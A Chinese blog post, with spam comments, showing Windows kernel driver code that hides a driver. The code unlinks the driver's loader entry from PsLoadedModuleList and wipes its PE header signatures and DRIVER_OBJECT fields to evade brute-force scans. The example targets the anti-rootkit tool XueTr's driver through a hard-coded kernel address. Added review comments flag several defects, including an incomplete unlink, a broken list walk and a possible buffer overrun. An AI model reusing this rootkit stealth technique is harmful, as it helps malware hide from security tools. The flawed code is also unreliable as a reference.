2012十月9

WD-隐藏驱动


1.拆链

1.kd> dt _DRIVER_OBJECT
ntdll!_DRIVER_OBJECT
+0x000 Type : Int2B
+0x002 Size : Int2B
+0x004 DeviceObject : Ptr32 _DEVICE_OBJECT
+0x008 Flags : Uint4B
+0x00c DriverStart : Ptr32 Void
+0x010 DriverSize : Uint4B
+0x014 DriverSection : Ptr32 Void
+0x018 DriverExtension : Ptr32 _DRIVER_EXTENSION
+0x01c DriverName : _UNICODE_STRING
+0x024 HardwareDatabase : Ptr32 _UNICODE_STRING
+0x028 FastIoDispatch : Ptr32 _FAST_IO_DISPATCH
+0x02c DriverInit : Ptr32 long
+0x030 DriverStartIo : Ptr32 void
+0x034 DriverUnload : Ptr32 void
+0x038 MajorFunction : [28] Ptr32 long

其中 DriverSection 指向 PLDR_DATA_TABLE_ENTRY,这个结构在 PEB->Ldr 遍历模块时也出现过,所以拆链即可实现隐藏驱动


2.防止暴力搜索

把特征干掉:Type、Size、PE 头等


3.示例

#include "main.h"
#include <ntimage.h>
 
// Hand-copied layout of the kernel's loader entry (nt!_LDR_DATA_TABLE_ENTRY).
// The struct is not in the public DDK headers and its layout differs between
// Windows builds. NOTE(review): assumed to match the target build — verify with
// `dt nt!_LDR_DATA_TABLE_ENTRY` on the debugged system before relying on offsets.
typedef struct _LDR_DATA_TABLE_ENTRY {
	LIST_ENTRY InLoadOrderLinks;            // the only list HideDriverFromPsLoadedModuleList rewrites
	LIST_ENTRY InMemoryOrderLinks;          // left intact by the unlink code below
	LIST_ENTRY InInitializationOrderLinks;  // left intact by the unlink code below
	PVOID DllBase;
	PVOID EntryPoint;
	ULONG SizeOfImage;
	UNICODE_STRING FullDllName;
	UNICODE_STRING BaseDllName;             // compared against the driver file name (e.g. L"NewSsdt.sys")
	ULONG Flags;
	USHORT LoadCount;
	USHORT TlsIndex;
	union {
		LIST_ENTRY HashLinks;
		struct {
			PVOID SectionPointer;
			ULONG CheckSum;
		};
	};
	union {
		struct {
			ULONG TimeDateStamp;
		};
		struct {
			PVOID LoadedImports;
		};
	};
	struct _ACTIVATION_CONTEXT *  EntryPointActivationContext;
	PVOID PatchInformation;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
 
// Unlinks the loader entry reachable from DriverObject->DriverSection from its
// InLoadOrderLinks list when the entry's BaseDllName equals DriverFileName, so a
// walker that follows that list no longer reaches it. Only InLoadOrderLinks is
// rewritten; the entry's other list links and the DRIVER_OBJECT itself are not
// touched here.
// Parameters: DriverObject   - driver whose DriverSection starts the walk
//             DriverFileName - expected BaseDllName (case-sensitive compare)
// Returns TRUE once an entry was unlinked, FALSE if nothing matched or the walk
// raised an exception (caught below and traced with KdPrint).
BOOLEAN HideDriverFromPsLoadedModuleList(PDRIVER_OBJECT DriverObject,PUNICODE_STRING DriverFileName)
{
	PLDR_DATA_TABLE_ENTRY LdrDataTable,HideLdrDataTable;
	BOOLEAN bRetOK = FALSE;
 
	__try
	{
		// DriverSection points at this driver's LDR_DATA_TABLE_ENTRY
		// (undocumented; see the struct definition above).
		LdrDataTable=(PLDR_DATA_TABLE_ENTRY)DriverObject->DriverSection;
		// Walk the list. NOTE(review): LdrDataTable is only advanced inside the
		// match branch, so if the first entry does not match the loop condition
		// below is already false — only DriverObject's own entry is ever examined.
		do
		{
			// Skip entries with an empty or NULL BaseDllName.
			if (LdrDataTable->BaseDllName.Length>0&&LdrDataTable->BaseDllName.Buffer!=NULL)
			{
				// Extra check: the last WCHAR of the name must be resident
				// (UNICODE_STRING.Length is in bytes, hence /2).
				if(MmIsAddressValid(&LdrDataTable->BaseDllName.Buffer[LdrDataTable->BaseDllName.Length/2-1]))
				{
					// CaseInSensitive=FALSE: exact-case comparison of the file name.
					if(RtlEqualUnicodeString(&LdrDataTable->BaseDllName,DriverFileName,FALSE))
					{
						// Remember the entry to remove.
						HideLdrDataTable=LdrDataTable;
						// Step to the successor and point its Blink at our predecessor.
						// NOTE(review): the predecessor's Flink is not rewritten here,
						// so a forward walk from the predecessor still reaches this entry.
						LdrDataTable=(PLDR_DATA_TABLE_ENTRY)HideLdrDataTable->InLoadOrderLinks.Flink;
						LdrDataTable->InLoadOrderLinks.Blink=HideLdrDataTable->InLoadOrderLinks.Blink;
 
						// Make the removed entry's own links point at itself.
						HideLdrDataTable->InLoadOrderLinks.Flink=&HideLdrDataTable->InLoadOrderLinks;
						HideLdrDataTable->InLoadOrderLinks.Blink=&HideLdrDataTable->InLoadOrderLinks;
 
						KdPrint(("PsLoadedModuleList success \r\n"));
 
						// Done; __leave exits the __try block and falls through to the return.
						bRetOK = TRUE;
						__leave;
					}
				}
			}
		}while ((PLDR_DATA_TABLE_ENTRY)DriverObject->DriverSection!=LdrDataTable&&LdrDataTable!=NULL);
	}
	__except(EXCEPTION_EXECUTE_HANDLER)
	{
		// Any fault while touching the list (bad pointer, paged-out name) lands here.
		KdPrint(("PsLoadedModuleList Error \r\n"));
	}
	return bRetOK;
}
 
// Defeats signature-based memory scans for the driver (section 2 of the post):
// zeroes the DOS ("MZ") and NT ("PE") signature words of the image header through
// an MDL mapping, then zeroes Type/Size/DriverStart/DriverSize in the DRIVER_OBJECT.
// Must run at PASSIVE_LEVEL (pages are probed, locked and mapped below).
// Parameter: pDriverObject - object whose DriverStart is the image base.
// Returns TRUE after the fields were written; FALSE at elevated IRQL, when the
// image has no valid DOS/NT signature, when the MDL could not be allocated or
// mapped, or when an exception was raised.
// NOTE(review): 32-bit only — DriverStart is truncated to ULONG at the cast below.
BOOLEAN HideDriverFromPeHeader(PDRIVER_OBJECT pDriverObject)
{
	PMDL pHeaderMdl;
	PIMAGE_DOS_HEADER ImageDosHeader;
	PIMAGE_NT_HEADERS ImageNtHeaders;
	PUCHAR ImageBaseShadow;
	ULONG ImageBase;
	ULONG dwLdrDataTableEntry = 0;   // unused
	BOOLEAN bRetOK = FALSE;
 
	// Bail out if the current IRQL is above PASSIVE_LEVEL.
	if (KeGetCurrentIrql() > PASSIVE_LEVEL)
	{
		return bRetOK;
	}
 
	ImageBase = (ULONG)pDriverObject->DriverStart;
	__try
	{
		// Check that DriverStart really is a PE image in memory. These reads go
		// through the original mapping; any fault is caught by the __except below.
		ImageDosHeader=(PIMAGE_DOS_HEADER)ImageBase;
		if (ImageDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
		{
			return bRetOK;
		}
		ImageNtHeaders=(PIMAGE_NT_HEADERS)(ImageBase+ImageDosHeader->e_lfanew);
		if (ImageNtHeaders->Signature!=IMAGE_NT_SIGNATURE)
		{
			return bRetOK;
		}
 
		// Modify the header through an MDL describing SizeOfHeaders bytes at ImageBase.
		pHeaderMdl=IoAllocateMdl((PVOID)ImageBase,ImageNtHeaders->OptionalHeader.SizeOfHeaders,FALSE,FALSE,NULL);
		if (pHeaderMdl)
		{
			// Lock the pages for kernel-mode write access.
			// NOTE(review): MmProbeAndLockPages raises on failure; that path goes to
			// the __except below, which does not free pHeaderMdl.
			MmProbeAndLockPages(pHeaderMdl, KernelMode, IoWriteAccess);  // lock so the pages cannot be paged out; otherwise MmGetSystemAddressForMdl would bugcheck
			// The returned system VA is discarded here and fetched again below.
			// NOTE(review): for an MDL already mapped into system space,
			// MmGetSystemAddressForMdlSafe is expected to return that existing
			// mapping rather than create a second one — confirm for the target build.
			MmMapLockedPagesSpecifyCache(pHeaderMdl,KernelMode,MmWriteCombined,NULL,FALSE,NormalPagePriority);
 
			// Writable system-space alias of the header pages.
			ImageBaseShadow = MmGetSystemAddressForMdlSafe(pHeaderMdl,NormalPagePriority);
 
			if (ImageBaseShadow)
			{
				// Re-derive the header pointers through the alias.
				ImageDosHeader=(PIMAGE_DOS_HEADER)ImageBaseShadow;
				ImageNtHeaders=(PIMAGE_NT_HEADERS)(ImageBaseShadow+ImageDosHeader->e_lfanew);
 
				// The original comment says "zero the whole PE header"; the code only
				// zeroes the first USHORT of the DOS header (e_magic) and the first
				// ULONG of the NT headers (Signature).
				*(PUSHORT)ImageDosHeader = 0x00;
				*(PULONG)ImageNtHeaders = 0x00;
 
				// Wipe identifying fields of the DRIVER_OBJECT itself.
				DbgPrint("pDriverObject:%08x\r\n",pDriverObject);
 
				// First USHORT of DRIVER_OBJECT is Type (offset 0x000 in the dt dump above).
				*(PUSHORT)pDriverObject = 0;
 
				DbgPrint("Size:%d\r\n",pDriverObject->Size);
 
				// Clear Size (the original comment gives 0x168), DriverStart and DriverSize.
				pDriverObject->Size = 0x0;
				pDriverObject->DriverStart = 0x0;
				pDriverObject->DriverSize = 0x0;
				bRetOK = TRUE;
			}
			// Tear down the mapping and the MDL.
			// NOTE(review): this runs even when ImageBaseShadow is NULL (the branch
			// above was skipped); unmapping a NULL address is outside the API contract.
			MmUnmapLockedPages(ImageBaseShadow,pHeaderMdl);
			MmUnlockPages(pHeaderMdl);
			IoFreeMdl(pHeaderMdl);
 
		}
	}
	__except(EXCEPTION_EXECUTE_HANDLER)
	{
		// Faults from the header reads, probe/lock or the writes above end up here.
		KdPrint(("PeHeader Error \r\n"));
	}
	return bRetOK;
}
 
// Hides the driver whose DRIVER_OBJECT is pDrvObject: unlinks its loader entry
// (matched by file name), then wipes its PE and DRIVER_OBJECT signature fields.
// Parameters: pDrvObject      - target driver object (not necessarily this driver's)
//             lpwServicesName - NUL-terminated file name to match, e.g. L"NewSsdt.sys"
// Both steps only trace their outcome; HideDriverFromPeHeader's result is ignored.
VOID HideDriver(PDRIVER_OBJECT pDrvObject,WCHAR *lpwServicesName)
{
	UNICODE_STRING DriverName;
 
	// Local copy of the name. NOTE(review): wcsncat is bounded by the source
	// length, not by the 100-WCHAR destination, so a name of 100 or more
	// characters overruns lpwDriverFileName.
	WCHAR lpwDriverFileName[100];
	memset(lpwDriverFileName,0,sizeof(lpwDriverFileName));
	wcsncat(lpwDriverFileName,lpwServicesName,wcslen(lpwServicesName));
 
	// DriverName borrows the stack buffer; it is valid only within this function.
	RtlInitUnicodeString(&DriverName,lpwDriverFileName);
 
	// Step 1: unlink the module from the loader list.
	if(HideDriverFromPsLoadedModuleList(pDrvObject,&DriverName))
	{
		KdPrint(("HideDriverFromPsLoadedModuleList ok\n"));
	}
	// NOTE(review): %wZ expects a PUNICODE_STRING; DriverName is passed by value here.
	KdPrint(("Driver:%wZ\n",DriverName));
 
	// Step 2: wipe the PE header and DRIVER_OBJECT signature fields.
	HideDriverFromPeHeader(pDrvObject);
}
 
 
// Unload routine for this helper driver: only traces. Nothing is undone here;
// the modifications were made to another driver's object (see DriverEntry),
// not to pDriverObject.
VOID DDKUnload (IN PDRIVER_OBJECT pDriverObject)
{
	KdPrint(("[DDKUnload]-start\n"));
 
	KdPrint(("[DDKUnload]-end\n"));
}
 
// Entry point: installs the unload routine, then hides the target driver
// (XueTr's "NewSsdt.sys") via HideDriver.
// Parameters: pDriverObject - this driver's object; pRegistryPath - unused.
// Returns STATUS_SUCCESS unconditionally, whatever HideDriver did.
NTSTATUS DriverEntry (IN PDRIVER_OBJECT pDriverObject,
					  IN PUNICODE_STRING pRegistryPath)
{
	// Hard-coded kernel address of the target DRIVER_OBJECT from the author's
	// debugging session (the post notes it could be looked up programmatically
	// instead). NOTE(review): an integer is assigned to a pointer without a cast
	// and never validated — on any other system or boot this is likely arbitrary
	// kernel memory, and HideDriver will fault on or corrupt it.
	PDRIVER_OBJECT driver_object = 0x89e5fda0;
	KdPrint(("[DriverEntry]-start\n"));
	pDriverObject->DriverUnload = DDKUnload;
 
	// The XueTr driver object we want to hide.
	HideDriver(driver_object,L"NewSsdt.sys");
 
 
	KdPrint(("[DriverEntry]-end\n"));
	return STATUS_SUCCESS;
}

运行后,发现 xuetr 打不开了,它应该是使用了暴力内存搜索


文章作者:hgy413
本文地址:http://hgy413.com/1530.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!

2 Responses to “WD-隐藏驱动”

  1. #1 Ilene 回复 | 引用 Post:2016-04-20 05:01

    You ought to take part in a contest for one of the most useful blogs on the web.
    I most certainly will highly recimmend this web site!

  2. #2 miraralcielo.com 回复 | 引用 Post:2016-08-03 22:59

    L’ergonomie de l’application, qui propose la caméra dès l’ouverture,
    incite les membres à créer du contenu et le partager à des
    amis ou dans leur Story.
